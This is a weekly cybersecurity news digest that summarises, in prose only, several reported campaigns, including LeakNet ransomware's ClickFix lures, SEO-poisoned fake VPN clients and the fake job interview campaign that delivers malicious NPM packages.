Weekly Summary Cyberattack – 12 to 18 march

LeakNet Ransomware Uses ClickFix, Deno Runtime in Stealthy Attacks  

Cybersecurity researchers have reported that the ransomware operator LeakNet is expanding its capabilities by introducing new initial access and execution techniques, notably leveraging ClickFix lures delivered via compromised legitimate websites and a previously unreported Deno-based in-memory loader. This marks a strategic shift from reliance on initial access brokers (IABs) toward self-directed intrusion campaigns, allowing the group to scale operations and broaden its victim pool through opportunistic delivery. 

New Malware Highlights Increased Systematic Targeting of Network Infrastructure  

Researchers identified new malware samples highlighting a growing and systematic trend of threat actors targeting network infrastructure as an initial access and persistence vector. The findings confirm that this activity is no longer limited to nation-state APT groups, but is increasingly leveraged by financially motivated actors, including cryptomining operations. Two previously undocumented malware variants were observed: a new CondiBot DDoS botnet variant, derived from the Mirai ecosystem, and Monaco, a multi-architecture SSH scanner and cryptominer. 

Hive0163 Uses AI-Assisted Slopoly Malware for Persistent Access in Ransomware Attacks  

Cybersecurity researchers reported that the financially motivated threat cluster Hive0163 deployed a likely AI-generated malware framework named “Slopoly” during a ransomware intrusion in early 2026. The activity demonstrates early but notable adoption of artificial intelligence by cybercriminal groups to accelerate malware development and maintain persistent access in victim environments. Hive0163 is known for conducting large-scale ransomware operations and data exfiltration campaigns, frequently deploying Interlock ransomware alongside several private crypters and backdoors including NodeSnake, InterlockRAT, and the JunkFiction loader. 

Storm-2561 Uses SEO Poisoning to Distribute Fake VPN Clients for Credential Theft  

Microsoft Threat Intelligence reported that the financially motivated cybercriminal group Storm-2561 is conducting a credential-theft campaign that distributes fake VPN clients through SEO poisoning to redirect users searching for legitimate enterprise VPN software to attacker-controlled websites and malicious downloads. Active since at least May 2025, the campaign manipulates search engine results for queries such as “Pulse VPN download” or “Pulse Secure client,” leading victims to spoofed websites designed to mimic trusted VPN vendors. 

Contagious Interview: Malware Delivered Through Fake Developer Job Interviews  

Microsoft Defender Security Research Team reported ongoing activity linked to the “Contagious Interview” campaign, a sophisticated social-engineering operation that has been active since at least December 2022 and continues to target software developers at enterprise solution providers and media and communications companies. The attackers exploit trust in recruitment workflows by posing as recruiters from cryptocurrency trading firms or AI-based solution providers and conducting realistic job interview processes that include outreach, technical discussions, and coding assignments. During these staged interviews, victims are instructed to clone and execute malicious NPM packages hosted on platforms such as GitHub, GitLab, and Bitbucket, which ultimately deliver malware under the guise of legitimate technical evaluation tasks.